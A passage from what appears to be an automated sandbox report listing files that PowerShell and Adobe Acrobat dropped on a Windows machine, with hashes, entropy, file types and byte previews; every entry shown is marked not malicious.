                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qb0uk1zn.vci.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp0qkzjv.bu3.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuqwudok.b45.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9166j3yn_165vzyf_5n0.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                              Category:dropped
                                                                              Size (bytes):144514
                                                                              Entropy (8bit):7.992637131260696
                                                                              Encrypted:true
                                                                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                              Malicious:false
                                                                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91tflhss_165vzyi_5n0.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                              Category:dropped
                                                                              Size (bytes):144514
                                                                              Entropy (8bit):7.992637131260696
                                                                              Encrypted:true
                                                                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                              Malicious:false
                                                                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-37-16-665.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393)
                                                                              Category:dropped
                                                                              Size (bytes):16525
                                                                              Entropy (8bit):5.386483451061953
                                                                              Encrypted:false
                                                                              SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                              MD5:F49CA270724D610D1589E217EA78D6D1
                                                                              SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                              SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                              SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                              Malicious:false
                                                                              Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):15114
                                                                              Entropy (8bit):5.3569307172346905
                                                                              Encrypted:false
                                                                              SSDEEP:384:hd9GBG2zpzdz6zOWzWzPz/zRbzpzczUz+YdFMFOFMFGalaFa8apamELtLdLH+BbJ:hvKndB+iWa7T9bVIACaaMSkqGTY65BTE
                                                                              MD5:D04710BA383857C1DD2F07832FD6C0A3
                                                                              SHA1:4D0799AE51E0C802612B41EBDB4BBD8AA2A0E113
                                                                              SHA-256:B00ED59ABF7DFE7122F741DA5BB032A5EB674A90DFAC8F2E52626DF653F0A52B
                                                                              SHA-512:2EE2F452DC10458B85DE9C8F9055D6EDE940041F096A7340C8798B4F4533C6B869A29B9F0E4B32332B4BB6CD51ED7FC4B3BE7FDE789046D7217E2A3E37A12738
                                                                              Malicious:false
                                                                              Preview:SessionID=ac74b446-0767-40a9-9325-5ad8f7fcd2ac.1727703436691 Timestamp=2024-09-30T09:37:16:691-0400 ThreadID=7484 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ac74b446-0767-40a9-9325-5ad8f7fcd2ac.1727703436691 Timestamp=2024-09-30T09:37:16:696-0400 ThreadID=7484 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ac74b446-0767-40a9-9325-5ad8f7fcd2ac.1727703436691 Timestamp=2024-09-30T09:37:16:696-0400 ThreadID=7484 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ac74b446-0767-40a9-9325-5ad8f7fcd2ac.1727703436691 Timestamp=2024-09-30T09:37:16:697-0400 ThreadID=7484 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ac74b446-0767-40a9-9325-5ad8f7fcd2ac.1727703436691 Timestamp=2024-09-30T09:37:16:697-0400 ThreadID=7484 Component=ngl-lib_NglAppLib Description="SetConf

                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):35721
                                                                              Entropy (8bit):5.420058367836918
                                                                              Encrypted:false
                                                                              SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRuC:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRP
                                                                              MD5:A4A7CD7A67B6777ED5A9D4BEF1EF65EB
                                                                              SHA1:F0D51644E851862257A5D77102799656B5648111
                                                                              SHA-256:B7AB5002B3512D51BFE71FD6B7BB40FE54860C4C59776681EB1305C656105F1E
                                                                              SHA-512:6460489728DF9781F76C92A0FC15A44C7E2164EC3413B9D73F6799E5F582EFCA402B90F507ABF175A391B5CBCE55B7A84DF844C5C97B087F80D639273DAD3F13
                                                                              Malicious:false
                                                                              Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\061a807d-5edb-4d55-b1b1-3d2f9a2e08be.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                              Category:dropped
                                                                              Size (bytes):1407294
                                                                              Entropy (8bit):7.97605879016224
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/rKdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWL07oYGZQeYIGNPB:Ta3mlind9i4ufFXpAXkrfUs0kWLxYGZQ
                                                                              MD5:81778DB3CD3E202CD8FEB47572C9DF55
                                                                              SHA1:A030EAB46FE2ED66D14270A86F44303F0D742019
                                                                              SHA-256:2E4A0CE023C75E0A53D82D4D08DC4ACD144039D04CEA94103C26535CB5B56998
                                                                              SHA-512:97BFD23BD03D6E911059092ED0C44779588CE29AE31E8FA1510A7FEE2B92B9E07AE2FFD4614D2566D369E48554269DC95DE42E062E533A4AA5EEC4DBAAAD3D1B
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\7d2a028f-378d-4a73-8752-a5d6e7c26e87.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                              Category:dropped
                                                                              Size (bytes):1419751
                                                                              Entropy (8bit):7.976496077007677
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                              MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                              SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                              SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                              SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\8a17a3e6-f363-4e5c-8d78-736bbb360209.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                              Category:dropped
                                                                              Size (bytes):758601
                                                                              Entropy (8bit):7.98639316555857
                                                                              Encrypted:false
                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+mTJJJJv+9Uz:O3Pjegf121YS8lkipdjMMNB1Dofj5JJn
                                                                              MD5:9E2FECE244C30BF0735D1302B038E18C
                                                                              SHA1:040FE05481FB6A507C945E7A360FF78490C8FCD9
                                                                              SHA-256:64C4B80231815A5D741A1393103EB0A0746AF649AB9B1B04F70115BD7BE30A16
                                                                              SHA-512:FB4AC617F4599B1DFF5BE628E9F7129B02C60D695062D21112B82E21DFE19905295372B1D31F86B62CE50C643A90AEEE441DDE0D6F80B9A4CE0261A344B4A6E5
                                                                              Malicious:false
                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\bc8e2876-66d4-4613-96d5-ea2d333bb1b3.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                              Category:dropped
                                                                              Size (bytes):386528
                                                                              Entropy (8bit):7.9736851559892425
                                                                              Encrypted:false
                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                              Malicious:false
                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                              C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):98682
                                                                              Entropy (8bit):6.445287254681573
                                                                              Encrypted:false
                                                                              SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                              MD5:7113425405A05E110DC458BBF93F608A
                                                                              SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                              SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                              SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                              Malicious:false
                                                                              Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                              C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):737
                                                                              Entropy (8bit):7.501268097735403
                                                                              Encrypted:false
                                                                              SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                              MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                              SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                              SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                              SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                              Malicious:false
                                                                              Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61258363f7d26506.customDestinations-ms (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5380
                                                                              Entropy (8bit):3.452944844038945
                                                                              Encrypted:false
                                                                              SSDEEP:48:26Px8dE8dJ9JlAQHoMl6lSogZo3JDJagQHoMlJlSogZo3JDJO1:2tVyQHoMVH8QHoMYHN
                                                                              MD5:233274546747F1AE3702275535E1CF19
                                                                              SHA1:1A01D2A409808CD433CA2C99FCE5A38DAFC86B45
                                                                              SHA-256:9CADBA6F6CE3391EDEE158AF7D4F26131016D2A87CB655D000185A9F1B665514
                                                                              SHA-512:0AF1D00C1DFF127B467F915293795C1CCC4F4346CB61F234CF1BB9ADBEF1F870DD0C463042F0A5E69115790D47DC9AAA3B2B13845BB3A5BAB918E45EB5094FBD
                                                                              Malicious:false
